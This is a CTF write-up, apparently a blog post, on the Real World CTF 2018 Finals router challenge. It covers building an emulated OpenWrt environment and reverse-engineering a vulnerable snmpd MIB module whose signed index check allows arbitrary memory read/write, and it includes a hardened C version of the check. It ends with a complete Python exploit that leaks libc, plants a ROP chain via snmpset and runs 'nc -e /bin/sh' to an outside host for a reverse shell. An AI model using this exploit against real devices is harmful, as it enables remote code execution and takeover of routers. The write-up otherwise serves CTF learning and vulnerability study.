Real World Finals 2018 Router

Lately I have had more time on my hands, so I went through last year's Real World CTF Finals router challenge again from scratch.
[image]

Building Environment

Since I did not end up keeping a router, I first had to build a complete emulated router environment and start the snmpd service in it.
Router model:

Netgear R6300 v2
#https://openwrt.org/toh/netgear/netgear_r6300_v2

First download the OpenWrt source (18.06.1 or 18.06.2 both work; only the offsets in the final exploit may differ).
Set the build config:

Target System: BCM47XX/53XX
Target Profile: Netgear R6300 v2
Target Images: squashfs // generating the root filesystem is enough
Development: gdb&&gdbserver // for debugging later

Then save the config and build.
In the build output, locate the compiled root filesystem:

# ls
bin  etc  mnt      proc  root  sys  usr  www
dev  lib  overlay  rom   sbin  tmp  var

There are two approaches:

Build an image from the filesystem and boot it with qemu  # did not succeed
Start the whole environment in a chroot inside a qemu-booted ARM VM, or on any other machine that can run ARM binaries

I chose to set things up directly on a Raspberry Pi
(it can also be started in an ARM VM under qemu system mode; see below)
Copy the entire filesystem onto the Raspberry Pi (including the two ipk packages from the contest):
then configure the chroot environment:

sudo mount proc chroot_dir/proc -t proc
sudo mount sysfs  chroot_dir/sys -t sysfs
cp  /etc/hosts  chroot_dir/etc/hosts  # set up networking inside the chroot
# edit chroot_dir/etc/resolv.conf to configure DNS:
nameserver 8.8.8.8

Enter the chroot environment:

sudo chroot  .  ./bin/sh

Then install the contest's snmp packages:

opkg install ./libnetsnmp_5.8-1_arm_cortex-a9.ipk
opkg install ./snmpd_5.8-1_arm_cortex-a9.ipk
# opkg may fail because it cannot create its config files; creating a run directory under var fixes this

Confirm the snmp service is up.
On the router side:

/ # netstat -anp|grep snmpd
udp        0      0 0.0.0.0:161             0.0.0.0:*                           1922/snmpd
udp        0      0 :::161                  :::*                                1922/snmpd
unix  2      [ ACC ]     STREAM     LISTENING      18493 1922/snmpd          /var/run/agentx.sock

On the host side:

kirin@kirin-virtual-machine:~$ snmpwalk -v 1 -c public 192.168.137.33  .1
iso.3.6.1.4.1.2021.13.32.1.0 = INTEGER: 0
iso.3.6.1.4.1.2021.13.32.2.0 = INTEGER: 1996043560
End of MIB

Likewise, the service can be started inside an ARM VM booted in qemu system mode:

Download the kernel && image:
https://people.debian.org/~aurel32/qemu/armhf/
Configure the qemu VM network:
https://kirin-say.top/2019/02/23/Building-MIPS-Environment-for-Router-PWN/
Start the qemu VM:
sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2"  -net nic,macaddr=00:16:3e:00:00:01 -net tap 
Once the VM is up, set up and run the chroot environment the same way

Find R/W at Any Address in MIB

Run snmpd under gdbserver in the emulated router environment and trace program flow with IDA's dynamic debugger.
The snmp service first initialises the MIB, the agent and so on:

LOAD:000125B8 BL              init_mib_modules
LOAD:000125BC LDR             R0, [R10]
LOAD:000125C0 BL              init_snmp
LOAD:000125C4 BL              init_master_agent

Inside init_mib_modules:

int init_mib_modules()
{
  int result; // r0
  int v1; // r3

  result = should_init();
  if ( result )
    result = j_init_greatSensors();
  v1 = dword_1102C;
  dword_11028 = 1;
  if ( !dword_1102C )
  {
    dword_1102C = 1;
    result = snmp_register_callback(v1, 2, (int)sub_9D4);
    if ( result )
      result = snmp_log(3, "error registering for SHUTDOWN callback for mib modules\n");
  }
  return result;
}

It first calls init_greatSensors() to register the callback handlers:


LOAD:000008E0 init_greatSensors                       ; CODE XREF: j_init_greatSensors+8↑j
LOAD:000008E0                                         ; DATA XREF: LOAD:000002D8↑o ...
LOAD:000008E0
LOAD:000008E0 var_70          = -0x70
LOAD:000008E0 var_64          = -0x64
LOAD:000008E0 var_60          = -0x60
LOAD:000008E0 var_38          = -0x38
LOAD:000008E0
LOAD:000008E0                 LDR             R12, =(dword_A88 - 0x8FC)
LOAD:000008E4                 STMFD           SP!, {R4,R5,LR}
LOAD:000008E8                 SUB             SP, SP, #0x64
LOAD:000008EC                 ADD             LR, SP, #0x70+var_60
LOAD:000008F0                 LDR             R5, =(_GLOBAL_OFFSET_TABLE_ - 0x90C)
LOAD:000008F4                 ADD             R12, PC, R12 ; dword_A88
LOAD:000008F8                 MOV             R4, R12
LOAD:000008FC                 ADD             R12, R12, #0x28
LOAD:00000900                 LDMIA           R4!, {R0-R3}
LOAD:00000904                 ADD             R5, PC, R5 ; _GLOBAL_OFFSET_TABLE_
LOAD:00000908                 STMIA           LR!, {R0-R3}
LOAD:0000090C                 LDMIA           R4!, {R0-R3}
LOAD:00000910                 STMIA           LR!, {R0-R3}
LOAD:00000914                 LDMIA           R4, {R0,R1}
LOAD:00000918                 MOV             R4, #3
LOAD:0000091C                 STMIA           LR, {R0,R1}
LOAD:00000920                 ADD             LR, SP, #0x70+var_38
LOAD:00000924                 LDMIA           R12!, {R0-R3}
LOAD:00000928                 STMIA           LR!, {R0-R3}
LOAD:0000092C                 LDMIA           R12!, {R0-R3}
LOAD:00000930                 STMIA           LR!, {R0-R3}
LOAD:00000934                 ADD             R2, SP, #0x70+var_60
LOAD:00000938                 LDMIA           R12, {R0,R1}
LOAD:0000093C                 LDR             R3, =(off_10FFC - 0x10FAC)
LOAD:00000940                 STMIA           LR, {R0,R1}
LOAD:00000944                 LDR             R0, =(aGreatmiscsenso - 0x958)
LOAD:00000948                 LDR             R3, [R5,R3] ; handle_greatMiscSensorsDevice
LOAD:0000094C                 STR             R4, [SP,#0x70+var_70]
LOAD:00000950                 ADD             R0, PC, R0 ; "greatMiscSensorsDevice"
LOAD:00000954                 STR             R3, [SP,#0x70+var_64]
LOAD:00000958                 MOV             R3, #0xA
LOAD:0000095C                 LDR             R1, [SP,#0x70+var_64]
LOAD:00000960                 BL              netsnmp_create_handler_registration
LOAD:00000964                 BL              netsnmp_register_scalar
LOAD:00000968                 LDR             R3, =(off_10FF0 - 0x10FAC)
LOAD:0000096C                 ADD             R2, SP, #0x70+var_38
LOAD:00000970                 LDR             R0, =(aGreatmiscsenso_0 - 0x980)
LOAD:00000974                 LDR             R3, [R5,R3] ; handle_greatMiscSensorsIndex
LOAD:00000978                 ADD             R0, PC, R0 ; "greatMiscSensorsIndex"
LOAD:0000097C                 STR             R4, [SP,#0x70+var_70]
LOAD:00000980                 STR             R3, [SP,#0x70+var_64]
LOAD:00000984                 MOV             R3, #0xA
LOAD:00000988                 LDR             R1, [SP,#0x70+var_64]
LOAD:0000098C                 BL              netsnmp_create_handler_registration
LOAD:00000990                 BL              netsnmp_register_scalar
LOAD:00000994                 MOV             R0, #0x78 ; 'x' ; size_t
LOAD:00000998                 BL              malloc
LOAD:0000099C                 LDR             R3, =(vla_str - 0x9AC)
LOAD:000009A0                 MOV             R2, #0
LOAD:000009A4                 ADD             R3, PC, R3 ; vla_str
LOAD:000009A8                 STR             R0, [R3,#(mib_address - 0x11020)]
LOAD:000009AC                 STR             R2, [R3]
LOAD:000009B0                 ADD             SP, SP, #0x64
LOAD:000009B4                 LDMFD           SP!, {R4,R5,PC}
LOAD:000009B4 ; End of function init_greatSensors

It registers two callbacks; the registration can be followed under the dynamic debugger:

int __fastcall sub_76F59344(int a1, int a2, int a3, int a4)
{
  int v4; // r5@1
  int v5; // r6@1
  int v6; // r7@1
  int v7; // r4@1
  int v8; // r5@2

  v4 = a1;
  v5 = a3;
  v6 = a4;
  v7 = ((int (__cdecl *)(int, int, int))unk_76F4D74C)(a1, a2, a3);
  if ( v7 )
  {
    v8 = ((int (__fastcall *)(int, int, int, int))unk_76F4C0D8)(v4, v7, v5, v6);
    if ( !v8 )
      ((void (__fastcall *)(int))unk_76F4C228)(v7);
  }
  else
  {
    v8 = 0;
  }
  return v8;
}

First the handler function address is written:
[screenshot]
then the function name:
[screenshot]
then the OID of the MIB object:
[screenshot]
The OID is 1.3.6.1.4.1.2021.13.32.2.0.
When snmpset/snmpget reads or writes this object, the request is dispatched by netsnmp_call_handler, which ultimately calls the callback registered for this OID, handle_greatMiscSensorsDevice.
The key part of netsnmp_call_handler:

v10 = (int (__fastcall *)(int *, int, int *, int))v8[3];
if ( !v10 )
        break;
se_find_label_in_slist((int)"agent_mode", *v6);
result = v10(v8, v9, v6, v7);
v12 = v8[2];

Likewise the other callback, handle_greatMiscSensorsIndex, corresponds to the OID:
[screenshot]
namely 1.3.6.1.4.1.2021.13.32.1.0.
Looking at the two callbacks, an arbitrary address read/write turns up.
handle_greatMiscSensorsDevice:

int __fastcall handle_greatMiscSensorsDevice(int a1, int a2, signed int *a3, _DWORD *a4)
{
  signed int v4; // r4
  int result; // r0
  int v6; // r0
  int v7; // r3
  const char *v8; // r2
  int v9; // r1

  v4 = *a3;
  if ( *a3 == 2 )
  {
    if ( vla_str <= 29 )
    {
      *(_DWORD *)(mib_address + 4 * vla_str) = **(_DWORD **)(*a4 + 16);
      return 0;
    }
LABEL_15:
    netsnmp_set_request_error();
    return 0;
  }
  if ( *a3 > 2 )
  {
    if ( v4 > 5 )
    {
      if ( v4 != 160 )
        goto LABEL_5;
      v6 = *a4;
      if ( vla_str > 29 )
      {
        v7 = 7;
        v9 = 4;
        v8 = "Go Back";
      }
      else
      {
        v7 = 4;
        v8 = (const char *)(mib_address + 4 * vla_str);
        v9 = 2;
      }
      snmp_set_var_typed_value(v6, v9, (int)v8, v7);
    }
    return 0;
  }
  if ( v4 )
  {
    if ( v4 != 1 )
    {
LABEL_5:
      snmp_log(3, "unknown mode (%d) in handle_greatMiscSensorsDevice\n", *a3);
      return 5;
    }
    return 0;
  }
  result = netsnmp_check_vb_type(*a4, 2);
  if ( result )
    goto LABEL_15;
  return result;
}

handle_greatMiscSensorsIndex:

int __fastcall handle_greatMiscSensorsIndex(int a1, int a2, signed int *a3, _DWORD *a4)
{
  signed int v4; // r4
  int result; // r0

  v4 = *a3;
  if ( *a3 == 2 )
  {
    vla_str = **(_DWORD **)(*a4 + 16);
    return 0;
  }
  if ( *a3 > 2 )
  {
    if ( v4 > 5 )
    {
      if ( v4 != 0xA0 )
        goto LABEL_5;
      snmp_set_var_typed_value(*a4, 2, (int)&vla_str, 4);// (netsnmp_variable_list *newvar, u_char type, const void *val_str, size_t val_len)
    }
    return 0;
  }
  if ( v4 )
  {
    if ( v4 != 1 )
    {
LABEL_5:
      snmp_log(3, "unknown mode (%d) in handle_greatMiscSensorsDevice\n", *a3);
      return 5;
    }
    return 0;
  }
  result = netsnmp_check_vb_type(*a4, 2);
  if ( result )
  {
    netsnmp_set_request_error();
    return 0;
  }
  return result;
}

In handle_greatMiscSensorsDevice, when the object is written with snmpset:

# *a3 cycles starting from 0 -> 0 1 2 3 0 1 2 3 ......
  if ( *a3 == 2 )
  {
    if ( vla_str <= 29 )
    {
      *(_DWORD *)(mib_address + 4 * vla_str) = **(_DWORD **)(*a4 + 16);
      return 0;
    }

mib_address is set in init_greatSensors during MIB initialisation at snmp service start:

result = malloc(0x78u);
mib_address = (int)result;
vla_str = 0;

and vla_str can be set from handle_greatMiscSensorsIndex:

vla_str = **(_DWORD **)(*a4 + 16);

i.e. it is the value we set on OID 1.3.6.1.4.1.2021.13.32.1.0.
So by first calling handle_greatMiscSensorsIndex to set vla_str (it only needs to be less than 29, so a negative value passes the check) and then calling handle_greatMiscSensorsDevice, we get an arbitrary address write.
Arbitrary read works on the same principle: when snmpget reads the object, it calls:

# v8 = (const char *)(mib_address + 4 * vla_str);
# the same check that vla_str is not greater than 29 applies here; set it to a negative value
snmp_set_var_typed_value(v6, v9, (int)v8, v7)

so the object's value is set from the address we chose,
and the object value returned to snmpget completes the arbitrary address read.
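As an added illustration (not code from the writeup or from the challenge binary), the bounds check from the two decompiled handlers is reduced below to plain C and placed beside a hardened version; the static array, the return conventions and the function names index_set/device_set/device_get are assumptions standing in for the module's heap buffer and net-snmp request plumbing.

```c
#include <stdint.h>

/* Model of the module state described in the writeup: init_greatSensors
 * malloc()s 0x78 bytes (30 four-byte slots) into mib_address and zeroes
 * the index vla_str. Here the buffer is a static array so the example runs
 * stand-alone; the variable names are the decompiled ones. */
#define SLOT_COUNT 30                     /* 0x78 / 4 */
static int32_t mib_storage[SLOT_COUNT];   /* stands in for mib_address */
static int32_t vla_str = 0;               /* index set via OID ...13.32.1.0 */

/* The check the decompiled handlers actually perform: an upper bound only.
 * Because vla_str is signed, a negative index passes and
 * mib_address + 4 * vla_str lands in memory before the buffer. */
int vuln_index_ok(int32_t idx) {
    return idx <= SLOT_COUNT - 1;
}

/* Hardened check: one unsigned comparison rejects both negative indices
 * and anything at or past the end of the buffer. */
int safe_index_ok(int32_t idx) {
    return (uint32_t)idx < (uint32_t)SLOT_COUNT;
}

/* Setter for greatMiscSensorsIndex (SET mode 2 in the decompile). The
 * original stores the value unconditionally; validating it here is the
 * cleanest fix, and the device paths below re-check so a stale or
 * directly corrupted index still cannot be used. */
int index_set(int32_t value) {
    if (!safe_index_ok(value))
        return -1;          /* caller raises netsnmp_set_request_error */
    vla_str = value;
    return 0;
}

/* Hardened SET path for greatMiscSensorsDevice. */
int device_set(int32_t value) {
    if (!safe_index_ok(vla_str))
        return -1;
    mib_storage[vla_str] = value;
    return 0;
}

/* Hardened GET path: fills *out, or returns -1 (the original's "Go Back"). */
int device_get(int32_t *out) {
    if (!safe_index_ok(vla_str))
        return -1;
    *out = mib_storage[vla_str];
    return 0;
}
```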

POC

First we need to leak libc.
Recall where the callback registration data lives:
use the arbitrary read to fetch the saved address of the registered handler and derive libc from it

hex(0x76F5F9F0-0x76F5F40c)=0x5e4

Then use the handler again to hijack program flow, in netsnmp_call_handler:

v10 = (int (__fastcall *)(int *, int, int *, int))v8[3];
if ( !v10 )
        break;
se_find_label_in_slist((int)"agent_mode", *v6);
result = v10(v8, v9, v6, v7);
v12 = v8[2];

At this point we only need to lay out a ROP chain in advance and finally overwrite the handler with the address of our rop chain; that hijacks program flow and ends in RCE:

ROPgadget  --binary ./libc.so 
......
0x000596bc : ldr r3, [pc, #0x3c] ; ldr r2, [pc, #0x3c] ; add r3, pc, r3 ; ldr r0, [pc, r2] ; ldr r3, [r3] ; blx r3
......
Here r3 and r2 can be pointed at the system function and the shell command string respectively
Modify the handler and operate on the snmp object again to get RCE
# other ROP chains work too; anything that ends in system(shell) is enough

Final POC:

# written against my emulated router environment; offsets may need adjusting for a different setup
# Python 2 script: relies on integer '/' and on str slices being passed to u32
from pwn import *
import sys
import os
#context.log_level="debug"
def read(ip,offset):
   cmd1="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0 i %s" %(ip,offset/4)
   cmd2="snmpget -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.2.0"   %ip
   os.system(cmd1)
   p2=process(cmd2,shell=True)
   p2.recvuntil("INTEGER: ")
   leak=int(p2.recvuntil("\n").strip())
   p2.close()
   return leak

def write(ip,offset,note):
   cmd1="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0 i %s" %(ip,offset/4)
   cmd2="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.2.0 i %s"  %(ip,note)
   os.system(cmd1)
   sleep(0.5)
   os.system(cmd2)

def get_shell(ip):
   cmd="snmpget -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0"   %ip
   os.system(cmd)

if __name__=="__main__":
    ip=sys.argv[1]
    #leak addr
    handle_addr=read(ip,-0x5e4)
    mibso_base=handle_addr-0x818
    libcso_base=handle_addr+0x507e8
    log.info("mibso_base="+hex(mibso_base))
    log.info("libcso_base="+hex(libcso_base))
    system_addr=libcso_base+0x43210
    ropchain_addr=libcso_base+0x596bc
    r3_addr=libcso_base+0x80394
    r2_addr=libcso_base+0x80398

    #build rop chain
    base=mibso_base+0xd29f0
    cmd_addr=libcso_base+0x80420
    write(ip,r3_addr-base,system_addr)
    write(ip,r2_addr-base,cmd_addr)
    cmd="nc -e /bin/sh 192.168.160.131 1234\x00" # the command to run on the router
    #padding
    cmd+="1"
    time=len(cmd)/4
    cmd=cmd.ljust((time+1)*4,"1")
    for i in range(time):
          write(ip,cmd_addr+i*4-base,u32(cmd[i*4:i*4+4]))
    write(ip,-0x5e4,ropchain_addr)
    get_shell(ip)

Run POC&&Get Shell

python payload.py  router_ip

[screenshot]
